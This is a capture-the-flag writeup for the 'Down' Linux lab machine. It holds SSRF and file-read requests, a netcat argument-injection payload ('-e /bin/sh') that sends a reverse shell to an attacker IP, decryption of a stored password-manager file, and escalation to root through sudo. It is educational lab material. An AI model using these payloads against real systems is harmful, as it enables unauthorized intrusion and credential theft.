Skip to main content

Machine (Easy) - Down

Writeup for the Down machine, an easy Linux challenge involving command injection and privilege escalation.

Writeup Author: BobBuilder

Objective: Gain initial access through a web interface vulnerable to command injection, extract user credentials from an encrypted password manager file, and achieve root access via full sudo rights.

Category Difficulty Platform Machine Author
Machine Easy Linux jkr

Enumeration

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
  • HTTP Title: Is it down or just me?
  • Interesting file path discovered through testing:
    • /index.php?expertmode=tcp enables raw IP/port-based netcat checks.

User

Identify Potential LFI and SSRF

Attempt SSRF via POST:

POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

url=http%3A%2F%2F127.0.0.1%2Fserver-status

Test for local file access, which shows the source code:

POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

url=http://127.0.0.1/ file:///var/www/html/index.php

Snippet from index.php

if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
  $ip = trim($_POST['ip']);
  $valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
  $port = trim($_POST['port']);
  $port_int = intval($port);
  $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
  if ( $valid_ip && $valid_port ) {
    $rc = 255; $output = '';
    $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");

The POST endpoint for expertmode=tcp uses unsanitized nc

/usr/bin/nc -vz $ip $port

Exploit: Reverse Shell via Netcat

Start listener:

nc -lvvp 1234

Trigger reverse shell:

POST /index.php?expertmode=tcp HTTP/1.1

ip=<attacker_ip>&port=1234+-e+/bin/sh

Successful connection:

connect to [me] from (UNKNOWN) [<down_ip>] 37804

Read user flag:

cat user_<REDACTED>.txt

Root

Discover Sensitive Files

Run linpeas.sh and look for interesting files:

/home/aleks/.local/share/pswm/pswm

Contents:

<Base64 Encrypted PSWM content>

Decrypt Stored Credentials

Use the following decoder:

  • https://github.com/repo4Chu/pswm-decoder

Run decoder:

python3 exploit.py

Output:

pswm    aleks    <REDACTED>

Use the password to switch user:

ssh aleks@<down_ip>
# or if already in shell:
su aleks

Check sudo permissions

sudo -l

Output:

(ALL : ALL) ALL

Easy, become root

sudo su
Back to top